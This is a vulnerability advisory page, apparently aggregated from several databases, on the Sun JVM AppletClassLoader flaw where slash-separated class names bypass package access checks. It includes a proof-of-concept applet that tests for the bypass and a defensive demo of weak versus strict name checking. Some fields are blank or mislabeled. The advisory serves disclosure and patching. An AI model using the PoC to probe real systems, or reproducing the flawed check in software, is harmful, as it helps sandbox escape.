Published: 2003-11-17 00:00:00
Revised: 2016-10-17 22:38:12

[Original] The loadClass method of the sun.applet.AppletClassLoader class in the Java Virtual Machine (JVM) in Sun SDK and JRE 1.4.1_03 and earlier allows remote attackers to bypass sandbox restrictions and execute arbitrary code via a loaded class name that contains "/" (slash) instead of "." (dot) characters, which bypasses a call to the Security Manager's checkPackageAccess method.

[CNNVD] Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability (CNNVD-200311-075)

        A vulnerability exists in the loadClass method of the sun.applet.AppletClassLoader class of the Java Virtual Machine (JVM) in Sun SDK and JRE 1.4.1_03 and earlier. A remote attacker can bypass sandbox restrictions and execute arbitrary code by means of a loaded class name that contains "/" (slash) instead of "." (dot) characters; the vulnerability bypasses the Security Manager's checkPackageAccess

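- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)


- OVAL (Technical Details for Detection)


- Official Database Links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other Links and Resources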
(UNKNOWN)  BUGTRAQ  20021023 [LSD] Security vulnerability in SUN's Java Virtual Machine implementation
(UNKNOWN)  BUGTRAQ  20031027 Re: [LSD] Security vulnerability in SUN's Java Virtual Machine implementation
(UNKNOWN)  BUGTRAQ  20031027 Re: [LSD] Security vulnerability in SUN's Java Virtual Machineimplementation
(UNKNOWN)  BID  8879

- Vulnerability Information

Sun Java Virtual Machine Slash Path Security Model Circumvention Vulnerability
High risk  Design error
2003-11-17 00:00:00 2010-04-26 00:00:00

- Advisories and Patches

        HP has released an advisory (HPSBUX0311-295) to address this issue. HP suggests the following manual updates:
        Java or later (T1456AA (JDK 1.4), T1457AA (JRE 1.4))
        Java or later (B9788AA (JDK 1.3), B9789AA (JRE 1.3))
        Java or later (B8110AA (JDK 1.2), B8111AA (JRE 1.2))
        These updates may be obtained from HP revised their advisory to include details about HP-UX 11.04 (VVOS). This issue affects HP-UX 11.04 (VVOS) with Virtualvault A.04.50 or Virtualvault A.04.60 or Virtualvault A.04.70 installed. These platforms are only affected if Java has been downloaded and integrated on Virtualvault. Further details may be found in the advisory.
        This issue is addressed in the following SDK and JRE versions of Windows Production Releases, Solaris OE Production Releases and Linux Production Releases:
        SDK and JRE 1.4.1_04 and later
        SDK and JRE 1.3.1_09 and later
        SDK and JRE 1.2.2_016 and later
        Solaris Operating Environment (OE) Reference Releases SDK and JRE 1.2.2_016 and later also include fixes.
        Fixes are available at the following location:
        See referenced advisory for additional details.
        HP has released an update to their original advisory stating that more HP-UX versions are affected than were originally reported. Please see the referenced advisory for more information.

- Vulnerability Information (23276)

Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability (EDBID:23276)
multiple dos
2003-10-22 Verified
0 Last Stage of Delirium
N/A

A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. 

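import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;

public class Simple extends Applet {

    StringBuffer buffer;

    public void init() {
        buffer = new StringBuffer();
    }

    public void start() {
        ClassLoader cl = this.getClass().getClassLoader();
        try {
            Class cla =
                cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
            addItem("No exception in loadClass. Vulnerable!");
        } catch (ClassNotFoundException e) {
            addItem("ClassNotFoundException in loadClass - " + e);
        } catch (AccessControlException e) {
            // The listing is cut off in the middle of this message.
            addItem("AccessControlException in loadClass - Not");
        }
    }

    // addItem and paint are missing from the truncated listing; minimal
    // versions are supplied here so that the applet compiles.
    void addItem(String newWord) {
        buffer.append(newWord);
        repaint();
    }

    public void paint(Graphics g) {
        g.drawString(buffer.toString(), 5, 15);
    }
}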


- Vulnerability Information

Java Virtual Machine sun.applet.AppletClassLoader loadClass Method Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability Description

The Sun Java Virtual Machine, present in their JDK & SDK products, contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a package is loaded into the JVM using a "/" instead of a "." for the package name separator. This causes the package access checks to be bypassed, allowing users to use packages for which they have no access. This flaw may lead to a loss of confidentiality and/or integrity.
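
The separator confusion described above, reduced to a stand-alone model and set beside a stricter gate. This is an added example, not Sun's source and not code from the referenced advisories; the class name PackageCheckDemo, its methods and the restricted prefix "sun." are assumptions chosen for illustration.

```java
import java.util.Arrays;
import java.util.List;

// Added illustration (hypothetical names): a loader-side gate that derives
// the package from the requested class name before asking for access.
public class PackageCheckDemo {

    // Assumed restricted prefix, standing in for a protected package list.
    static final List<String> RESTRICTED = Arrays.asList("sun.");

    static boolean isRestricted(String pkg) {
        for (String prefix : RESTRICTED) {
            if ((pkg + ".").startsWith(prefix)) return true;
        }
        return false;
    }

    // Weak form: only '.' counts as a separator, so a name written with '/'
    // looks like a class in the default package and is never checked.
    static boolean weakGateAllows(String name) {
        int i = name.lastIndexOf('.');
        if (i == -1) return true;
        return !isRestricted(name.substring(0, i));
    }

    // Hardened form: refuse any name that is not in dotted form, then run
    // the same package check.
    static boolean strictGateAllows(String name) {
        if (name.isEmpty() || name.indexOf('/') != -1) return false;
        return weakGateAllows(name);
    }

    public static void main(String[] args) {
        // Constructed sample names.
        String[] names = {
            "sun.applet.AppletClassLoader",
            "sun/applet/AppletClassLoader",
            "Simple",
        };
        for (String n : names) {
            System.out.println(n + "  weak=" + weakGateAllows(n)
                    + "  strict=" + strictGateAllows(n));
        }
    }
}
```

The point for reviewers of custom class loaders is that the access decision and the later name resolution must agree on one canonical form of the class name.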

- Timeline

2003-10-21 Unknown
2003-10-21 Unknown

- Solution

Upgrade to version 1.4.1_04, 1.3.1_09, or 1.2.2_16 or higher, as these versions have been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author